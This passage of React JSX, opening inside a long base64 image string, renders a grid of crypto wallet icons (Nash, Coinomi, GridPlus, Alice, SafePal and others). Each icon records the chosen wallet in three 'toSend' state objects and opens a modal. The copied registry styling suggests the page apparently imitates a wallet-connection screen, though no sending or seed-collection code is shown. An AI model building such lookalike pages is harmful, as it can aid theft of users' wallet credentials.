 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
 7l0oRRNEpgHi+w/usgWijahwbypVz2AwUQ6DtpWy8Z4xcY3K7BH7tFTIQ6H2MDqMES18Gr4NSk8ZcKyhMBynFGHI05tEA0MFZMhhc8PN3QIe4uPwFkT3TkMH4K31N8xbEJaxjLYNCt4M34paqaMhcOBaEXVXV9qknDtuu7i
 rI0zKyu/ampk7wsPXRowO1+kFOGjJbdq1M6BuBWwJF8GTaLDD3huMFCz88vNiPWUnhS/bblFXQtgQI7HU9YuRWx/ihRGWO+MUlK1ctQKJ3ruVEjaUSNlpg1VgK1kIDUicd7HOCA9DP5WkacBjVbygCltd9bvCQFKQZfrHCj
 86qI82gka6ciPNuIIKPSwjoWIfKM4BHn7bKUBEJazCHYkK4EAgDBW1CspL8ctt9riscdSqYlDOcdhihg2QUmlyGF4qWWXW3KdooLEG1z3pUFEOzDaE4dLChjcmvlVBh4gZILhEEJxV86pQsb0/9v8A/9oADAMBAAIAAwAAA
 BDzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
 zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzznbzzzzzzzzzzzzzzzzzzzzzzwTfzzzzzzzzy614ZLjWz7rqTnwwV7zzzzzzzMNFxZTZaD+kY1xinyjzzzzzzwwo7X
 RR2Tznv8AQYotp888888888ucp48fRl9qK/g98/q88888888888P898Puv/Nf9/sd888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
 8//EACkRAQACAQIDCQEAAwAAAAAAAAEAETEhQXGRwRAwUWGBobHR8XBA4fD/2gAIAQMBAT8Q/uatC2IjT/kAwVpr1l693uvPBnmvM+piDFCKTbT/ALaZtvyv6lWCPGN85HOt5MwRVL6w3W62ekE5GE6lciaiq5kIZrCZW0q
 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"
              alt="Nash"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Nash");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Nash",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Nash",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Nash",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">Nash</div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 kSIOSl">
            <img
              src={coinomi}
              alt="Coinomi"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Coinomi");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Coinomi",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Coinomi",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Coinomi",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Coinomi
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={gridplus}
              alt="GridPlus"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("GridPlus");
                setToSend({
                  ...toSend,
                  [e.target.name]: "GridPlus",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "GridPlus",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "GridPlus",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            GridPlus
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={coolwallet}
              alt="CoolWallet S"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("CoolWallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "CoolWallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "CoolWallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "CoolWallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            CoolWallet S
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 kSIOSl">
            <img
              src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAWgAAAFoCAMAAABNO5HnAAAABGdBTUEAALGPC/xhBQAAAtlQTFRF////6+vrxMTEnZ2denp6ZWVlUlJSPj4+Ky
                                                    srHBwcFhYWDw8PCQkJAgICAAAAAwMDEBAQHR0dLCwsPz8/U1NTZmZme3t7n5+fxsbG7e3t/Pz81dXVrq6uh4eHYGBgOTk5EhISFBQUOzs7YmJiiYmJsLCw19
                                                    fX/f39/v7+z8/PjY2NTExMDg4OT09PkZGR09PT1tbWlJSUExMTFRUVVlZWmJiY2traaGhoGBgYbW1tysrK3t7egYGBJCQkKCgohoaG4uLi8PDwmpqaPT09AQEBQ
                                                    UFB8vLyzc3NWFhYCAgICgoKXV1d0tLSSUlJTk5OycnJu7u7RUVFwMDAsbGxNjY2PDw8t7e3vb29Li4uMzMzw8PD5ubmWVlZX19f6urqkJCQERERlpaWxcXFLy8v
                                                    NDQ0y8vLaWlp7u7uubm5GRkZv7+/5OTkQ0ND6Ojotra2+/v7d3d3f39/7OzsQkJC7+/v4eHhJycn5eXlGxsbHx8f2NjYCwsLuLi4BQUFpaWljIyMnp6esrKy4ODg
                                                    GhoaeHh4eXl5Y2NjvLy8ICAgR0dHbm5ulZWVyMjI9vb2JiYmqqqqq6urJSUlgoKC39/fg4ODBwcHx8fHurq6cnJyBgYGdnZ2SEhIp6enpqamzMzM5+fnfn5+DQ0N
                                                    m5ubFxcXzs7OIiIi3Nzc29vbISEhIyMj3d3dZ2dn6enprKysqKioREREfX19DAwMS0tLdHR0r6+v0NDQhYWFMTExKioqc3NzbGxstbW1ra2tBAQE8/PzoqKimZmZ
                                                    4+Pj2dnZ9PT0hISEUFBQNzc3KSkp+vr6fHx8oaGhdXV1kpKSNTU1+Pj48fHx9fX1nJyci4uLa2troKCgWlpa+fn5ODg4V1dX1NTUb29vk5OTioqKUVFRvr6+MjIyq
                                                    amp9/f3MDAwYWFhXl5eVFRUXFxcwcHBHh4egICAW1tbZGRkj4+PSkpKOjo6tLS0wsLCcHBwpKSk0BWr3AAACzlJREFUeJzt3Ql7FtUdBfAEWSQQkrAIJAUJkI2iRB
                                                    ZZhYAvRbBKI4QYIksoRgJKJIECAtJCWyMg1QKyidSiQSgm1iIolihgW0sroGjaQjdrW7va5RO0kIenL+Rd5n/vnTn3puf3Cc49hJl3Zu6SkEBERERERERERERERER
                                                    ERERERERERERERERERERERERERERERERERERERERERERERERERERE9P8ksdV1rdu0bXd9+6QOHZM7eZDSMTUprXOXrt1u6N6jJzq9C9IzPtOr9419vHQbXWbffv2z
                                                    snPQY7FWbt6Azw7Uqzhc6k03D8pFj8k++bd0HWyu5CuGDB12K3pkNukxfIT5kq9oP3IUenx2GD3mNv9abjJ2XAF6lGjjJ9we8rvmS0ITu38OPVagSXdMDqLlJlPu/
                                                    Dx6vCCt7gqu5ctCd09FjxngC10CrvmywnvQ4w5W7rTpiJovKZqBHnyAiu9F1XxJyUz0+ANSeh+y5v8KzZqN7iAA6XMMPmarmlvW4t+EzPsiuuQm8+9HN+GrxH6BPJ
                                                    54kVz+ALoN/ywYgq43XMVCdB8+SW9tzZ9zk5QxLfJKveh2dLHNPfgQuhXzFmeiW41kRDG6F8MqH7bssnFF8pIWdfmoKkIXGl31UnQ75iz7ErrNWDovR/djyqAV6C5
                                                    jW/kIuiEzZs5FNxlPZot4Tz2tI7rH+FatRrek77oUdIterHkU3ZOutegKPQrdgm5Kz5fRBXoWcvpv+itOXDearHH4Ot3Kgfvg/6xy9rfHoFR0dzKZjv6eXrce3ZzU
                                                    SiefEROtfu6OrLOD7z0qLX6PFF21e+/yvoruTM0SdG9SMyx9/xxPsmNfAhZZ+T3FixFOfd1Kt/D7oFcPunSZ/hq6LR1j0O15t9rRC3STFGfme1RZNU9GrsKVOUxfR
                                                    zelqxzdoDc9nL5wXJLsxAzIdEvmi+qY78IvjznolkwoQ7cYX6kF88z1zbV/TcAd6I7MmIXuMZ7HDA00VPP4ho2rN2UULH3Ck6UFGZsWbNzweI2hO3HI8hVFuUbWW2
                                                    0e/o1E1QSJT5YbeRFeYrIW86bpj/Cpb47WTbFl62b9HHavR9Rdp7mtzdNmgjzdbZtmlCIzQfyxXW9sq3aUmstSumOVXhqbVzNrre/euavKbJqqXTt18hSaTWNSK51
                                                    xVWebD5RdrZPI3nkeu9UHlfSMP5H2JKlnutufSPqeVR/TxL1+hSqdqBwqZOtOKsoPhb6u2Mn5lqctCiO5079UOsar7tvz3HZ/gy14TjHYFDv3Yfq24nD2Pe93skmq
                                                    F+rufidTovjl+4Va/6Ptf1Et20T/o8mNVnudc8C322C40heUwoUKgggnNEZpKPsOBpNuv9rVY1ww6USU9mMcmBdUvElKd8SxQcXzbp7KOFIeCy7gAqVfefbta/odl
                                                    WFsDTLhEpWEI4NM6InK9P7CQD8256g8I7YPMqEX2QqDqDgUbMa9KjdE2/af3qgwhpeCDlmnEHJY0CHj6Cofwu7gU9bLUw4NPmUsufJ94ycH8ER4rUfkXwKG2HVOQ
                                                    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"
              alt="Alice"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Alice");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Alice",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Alice",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Alice",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">Alice</div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 kSIOSl">
            <img
              src={alphawallet}
              alt="AlphaWallet"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("AlphaWallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "AlphaWallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "AlphaWallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "AlphaWallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            AlphaWallet
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={tokenary}
              alt="Tokenary"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Tokenary");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Tokenary",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Tokenary",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Tokenary",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Tokenary
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={safepal}
              alt="SafePal"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("SafePal");
                setToSend({
